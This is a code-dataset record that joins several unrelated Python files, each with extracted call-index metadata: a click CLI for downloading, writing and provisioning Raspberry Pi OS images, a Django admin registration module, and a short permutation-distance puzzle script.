'import click\n'), ((3665, 3770), 'click.option', 'click.option', (['"""--strategy_params"""'], {'help': '"""The parameters for the strategy, as a comma-separated list"""'}), "('--strategy_params', help=\n 'The parameters for the strategy, as a comma-separated list')\n", (3677, 3770), False, 'import click\n'), ((3777, 3833), 'click.option', 'click.option', (['"""--exchange"""'], {'help': '"""Which exchange to use"""'}), "('--exchange', help='Which exchange to use')\n", (3789, 3833), False, 'import click\n'), ((3835, 3902), 'click.option', 'click.option', (['"""--datasource"""'], {'help': '"""Which data source class to use"""'}), "('--datasource', help='Which data source class to use')\n", (3847, 3902), False, 'import click\n'), ((4147, 4162), 'click.command', 'click.command', ([], {}), '()\n', (4160, 4162), False, 'import click\n'), ((4164, 4220), 'click.option', 'click.option', (['"""--strategy"""'], {'help': '"""Which strategy to use"""'}), "('--strategy', help='Which strategy to use')\n", (4176, 4220), False, 'import click\n'), ((4222, 4289), 'click.option', 'click.option', (['"""--datasource"""'], {'help': '"""Which data source class to use"""'}), "('--datasource', help='Which data source class to use')\n", (4234, 4289), False, 'import click\n'), ((4291, 4384), 'click.option', 'click.option', (['"""--datasource_path"""'], {'help': '"""The path to the datasource csv (if applicable)"""'}), "('--datasource_path', help=\n 'The path to the datasource csv (if applicable)')\n", (4303, 4384), False, 'import click\n'), ((4653, 4666), 'click.group', 'click.group', ([], {}), '()\n', (4664, 4666), False, 'import click\n'), ((3396, 3502), 'curio.run', 'curio.run', (['bt.run', 'strategy_object', 'exchange_object', 'datasrce_object', 'strategy_params', 'datasource_path'], {}), '(bt.run, strategy_object, exchange_object, datasrce_object,\n strategy_params, datasource_path)\n', (3405, 3502), False, 'import curio\n'), ((2789, 2877), 'click.echo', 'click.echo', (['"""Argument error. Run main.py backtest --help for info on the arguments"""'], {}), "(\n 'Argument error. Run main.py backtest --help for info on the arguments')\n", (2799, 2877), False, 'import click\n'), ((2227, 2369), 'click.Path', 'click.Path', ([], {'exists': '(True)', 'file_okay': '(True)', 'dir_okay': '(False)', 'writable': '(False)', 'readable': '(True)', 'resolve_path': '(False)', 'allow_dash': '(True)', 'path_type': 'str'}), '(exists=True, file_okay=True, dir_okay=False, writable=False,\n readable=True, resolve_path=False, allow_dash=True, path_type=str)\n', (2237, 2369), False, 'import click\n'), ((635, 680), 'logging.FileHandler', 'logging.FileHandler', (['"""last_run.log"""'], {'mode': '"""w"""'}), "('last_run.log', mode='w')\n", (654, 680), False, 'import logging\n'), ((694, 717), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (715, 717), False, 'import logging\n')] |
import sys
import traceback
import click
from . import imaging_utility as iu
from . import provisioning
from . import __version__
def eprint(msg, show):
if show:
traceback.print_exc()
print(file=sys.stderr)
click.echo(msg, file=sys.stderr)
@click.group()
@click.version_option(__version__)
@click.option('--traceback', is_flag=True,
help='Show the full python exception if an error occurs.')
@click.pass_context
def cli(ctx, traceback):
ctx.ensure_object(dict)
ctx.obj['TRACEBACK'] = traceback
@cli.command()
@click.option('--hidden/--plain', default=True,
help='Hide or show password input.')
@click.pass_context
def create(ctx, hidden):
"""Create a provisioning configuration."""
try:
provisioning.create(hidden)
except Exception as exc:
eprint(f'Creating provisioning configuration failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('os')
@click.option('--image-cache',
type=click.Path(file_okay=False),
default='~/.cache/bake-a-py',
help='Path where the downloaded image is stored.')
@click.option('-o', '--output',
help='Device path to write the OS image to.')
@click.option('--chksum/--no-chksum', '-c/ ', default=False,
help='Check the checksum of the OS image before writing.')
@click.option('--target', '-t',
help='Name of the configuration file.')
@click.option('--become', '-b', is_flag=True,
help='Run the writing of the image as super user.')
@click.option('--remove', '-r', is_flag=True,
help='Remove the image file after writing.')
@click.option('--keep', '-k', is_flag=True,
help='Keep the downloaded archive.')
@click.option('--encrypted/--decrypted', ' /-d', default=True,
help='Force usage of encrypted or decrypted provisioning configuration.')
@click.pass_context
def write(ctx, os, image_cache, output, chksum, target, become, remove, keep,
encrypted):
"""Write the image.
OS is the image name (one of the results of the list command).
This command download, extracts, checks integrity, writes and provisions
if neccessary.
"""
try:
iu.write(os, image_cache, output, target, chksum, become, remove, keep,
encrypted)
except Exception as exc:
eprint(f'Writing failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('target')
@click.option('-o', '--output',
help='Device path to write the OS image to.')
@click.option('--encrypted/--decrypted', ' /-d', default=True,
help='Force usage of encrypted or decrypted provisioning configuration.')
@click.pass_context
def provision(ctx, target, output, encrypted):
"""Provision the os on OUTPUT for TARGET.
TARGET is the name of the configuration file.
"""
try:
iu.provision(target, output, encrypted)
except Exception as exc:
eprint(f'Provisioning failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('device')
@click.pass_context
def mount(ctx, device):
"""Mount all partitions on DEVICE."""
try:
iu.udisks2.mount(device)
except Exception as exc:
eprint(f'Mounting {device} failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('device')
@click.pass_context
def unmount(ctx, device):
"""Unmount all partitions on DEVICE."""
try:
iu.udisks2.unmount(device)
except Exception as exc:
eprint(f'Unmounting {device} failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.option('-a', '--all', is_flag=True,
help='All available images (not only Raspberry Pi OS images).')
@click.pass_context
def list(ctx, all):
"""List available OS images."""
try:
if all:
result = iu.get_all_images()
else:
result = iu.get_raspios_flavors()
click.echo('\n'.join(result))
except Exception as exc:
eprint(f'Listing OS images failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.option('--verbose', '-v', is_flag=True,
help='Show the complete description of the os image.')
@click.argument('name')
@click.pass_context
def describe(ctx, name, verbose):
"""Display the description of the OS image NAME.
"""
try:
desc = iu.get_image_description(name)
if verbose:
click.echo(desc)
else:
click.echo(desc['description'])
except Exception as exc:
eprint(f'Displaying description of {name} failed ({exc}).',
ctx.obj['TRACEBACK'])
if __name__ == '__main__':
cli(obj={}) | [
"click.argument",
"click.group",
"click.option",
"click.echo",
"click.Path",
"click.version_option",
"traceback.print_exc"
] | [((269, 282), 'click.group', 'click.group', ([], {}), '()\n', (280, 282), False, 'import click\n'), ((284, 317), 'click.version_option', 'click.version_option', (['__version__'], {}), '(__version__)\n', (304, 317), False, 'import click\n'), ((319, 424), 'click.option', 'click.option', (['"""--traceback"""'], {'is_flag': '(True)', 'help': '"""Show the full python exception if an error occurs."""'}), "('--traceback', is_flag=True, help=\n 'Show the full python exception if an error occurs.')\n", (331, 424), False, 'import click\n'), ((552, 640), 'click.option', 'click.option', (['"""--hidden/--plain"""'], {'default': '(True)', 'help': '"""Hide or show password input."""'}), "('--hidden/--plain', default=True, help=\n 'Hide or show password input.')\n", (564, 640), False, 'import click\n'), ((931, 951), 'click.argument', 'click.argument', (['"""os"""'], {}), "('os')\n", (945, 951), False, 'import click\n'), ((1112, 1188), 'click.option', 'click.option', (['"""-o"""', '"""--output"""'], {'help': '"""Device path to write the OS image to."""'}), "('-o', '--output', help='Device path to write the OS image to.')\n", (1124, 1188), False, 'import click\n'), ((1194, 1317), 'click.option', 'click.option', (['"""--chksum/--no-chksum"""', '"""-c/ """'], {'default': '(False)', 'help': '"""Check the checksum of the OS image before writing."""'}), "('--chksum/--no-chksum', '-c/ ', default=False, help=\n 'Check the checksum of the OS image before writing.')\n", (1206, 1317), False, 'import click\n'), ((1318, 1388), 'click.option', 'click.option', (['"""--target"""', '"""-t"""'], {'help': '"""Name of the configuration file."""'}), "('--target', '-t', help='Name of the configuration file.')\n", (1330, 1388), False, 'import click\n'), ((1395, 1496), 'click.option', 'click.option', (['"""--become"""', '"""-b"""'], {'is_flag': '(True)', 'help': '"""Run the writing of the image as super user."""'}), "('--become', '-b', is_flag=True, help=\n 'Run the writing of the image as super user.')\n", (1407, 1496), False, 'import click\n'), ((1498, 1592), 'click.option', 'click.option', (['"""--remove"""', '"""-r"""'], {'is_flag': '(True)', 'help': '"""Remove the image file after writing."""'}), "('--remove', '-r', is_flag=True, help=\n 'Remove the image file after writing.')\n", (1510, 1592), False, 'import click\n'), ((1593, 1672), 'click.option', 'click.option', (['"""--keep"""', '"""-k"""'], {'is_flag': '(True)', 'help': '"""Keep the downloaded archive."""'}), "('--keep', '-k', is_flag=True, help='Keep the downloaded archive.')\n", (1605, 1672), False, 'import click\n'), ((1678, 1818), 'click.option', 'click.option', (['"""--encrypted/--decrypted"""', '""" /-d"""'], {'default': '(True)', 'help': '"""Force usage of encrypted or decrypted provisioning configuration."""'}), "('--encrypted/--decrypted', ' /-d', default=True, help=\n 'Force usage of encrypted or decrypted provisioning configuration.')\n", (1690, 1818), False, 'import click\n'), ((2382, 2406), 'click.argument', 'click.argument', (['"""target"""'], {}), "('target')\n", (2396, 2406), False, 'import click\n'), ((2408, 2484), 'click.option', 'click.option', (['"""-o"""', '"""--output"""'], {'help': '"""Device path to write the OS image to."""'}), "('-o', '--output', help='Device path to write the OS image to.')\n", (2420, 2484), False, 'import click\n'), ((2490, 2630), 'click.option', 'click.option', (['"""--encrypted/--decrypted"""', '""" /-d"""'], {'default': '(True)', 'help': '"""Force usage of encrypted or decrypted provisioning configuration."""'}), "('--encrypted/--decrypted', ' /-d', default=True, help=\n 'Force usage of encrypted or decrypted provisioning configuration.')\n", (2502, 2630), False, 'import click\n'), ((2994, 3018), 'click.argument', 'click.argument', (['"""device"""'], {}), "('device')\n", (3008, 3018), False, 'import click\n'), ((3283, 3307), 'click.argument', 'click.argument', (['"""device"""'], {}), "('device')\n", (3297, 3307), False, 'import click\n'), ((3580, 3690), 'click.option', 'click.option', (['"""-a"""', '"""--all"""'], {'is_flag': '(True)', 'help': '"""All available images (not only Raspberry Pi OS images)."""'}), "('-a', '--all', is_flag=True, help=\n 'All available images (not only Raspberry Pi OS images).')\n", (3592, 3690), False, 'import click\n'), ((4067, 4172), 'click.option', 'click.option', (['"""--verbose"""', '"""-v"""'], {'is_flag': '(True)', 'help': '"""Show the complete description of the os image."""'}), "('--verbose', '-v', is_flag=True, help=\n 'Show the complete description of the os image.')\n", (4079, 4172), False, 'import click\n'), ((4173, 4195), 'click.argument', 'click.argument', (['"""name"""'], {}), "('name')\n", (4187, 4195), False, 'import click\n'), ((233, 265), 'click.echo', 'click.echo', (['msg'], {'file': 'sys.stderr'}), '(msg, file=sys.stderr)\n', (243, 265), False, 'import click\n'), ((176, 197), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (195, 197), False, 'import traceback\n'), ((992, 1019), 'click.Path', 'click.Path', ([], {'file_okay': '(False)'}), '(file_okay=False)\n', (1002, 1019), False, 'import click\n'), ((4398, 4414), 'click.echo', 'click.echo', (['desc'], {}), '(desc)\n', (4408, 4414), False, 'import click\n'), ((4441, 4472), 'click.echo', 'click.echo', (["desc['description']"], {}), "(desc['description'])\n", (4451, 4472), False, 'import click\n')] |
from django.contrib import admin
from ServerRestAPI.models import (
Student, Teacher, StudentLecture,
TeacherLecture, Lecture
)
admin.site.register(Student)
admin.site.register(Teacher)
admin.site.register(StudentLecture)
admin.site.register(TeacherLecture)
admin.site.register(Lecture) | [
"django.contrib.admin.site.register"
] | [((143, 171), 'django.contrib.admin.site.register', 'admin.site.register', (['Student'], {}), '(Student)\n', (162, 171), False, 'from django.contrib import admin\n'), ((172, 200), 'django.contrib.admin.site.register', 'admin.site.register', (['Teacher'], {}), '(Teacher)\n', (191, 200), False, 'from django.contrib import admin\n'), ((201, 236), 'django.contrib.admin.site.register', 'admin.site.register', (['StudentLecture'], {}), '(StudentLecture)\n', (220, 236), False, 'from django.contrib import admin\n'), ((237, 272), 'django.contrib.admin.site.register', 'admin.site.register', (['TeacherLecture'], {}), '(TeacherLecture)\n', (256, 272), False, 'from django.contrib import admin\n'), ((273, 301), 'django.contrib.admin.site.register', 'admin.site.register', (['Lecture'], {}), '(Lecture)\n', (292, 301), False, 'from django.contrib import admin\n')] |
import itertools,math
L = [1,2,3]
p = list(itertools.permutations(L,3))
D = [list(map(int,input().split())) for i in range(4)]
ans = 999999999999
for pp in p:
k = [0]+list(pp)
d = 0
for i in range(1,4):
d += math.sqrt((D[k[i-1]][0] - D[k[i]][0])**2 + (D[k[i-1]][1] - D[k[i]][1])**2)
if d < ans:
ans = d
print(int(ans)) | [
"itertools.permutations",
"math.sqrt"
] | [((43, 71), 'itertools.permutations', 'itertools.permutations', (['L', '(3)'], {}), '(L, 3)\n', (65, 71), False, 'import itertools, math\n'), ((230, 317), 'math.sqrt', 'math.sqrt', (['((D[k[i - 1]][0] - D[k[i]][0]) ** 2 + (D[k[i - 1]][1] - D[k[i]][1]) ** 2)'], {}), '((D[k[i - 1]][0] - D[k[i]][0]) ** 2 + (D[k[i - 1]][1] - D[k[i]][1]\n ) ** 2)\n', (239, 317), False, 'import itertools, math\n')] |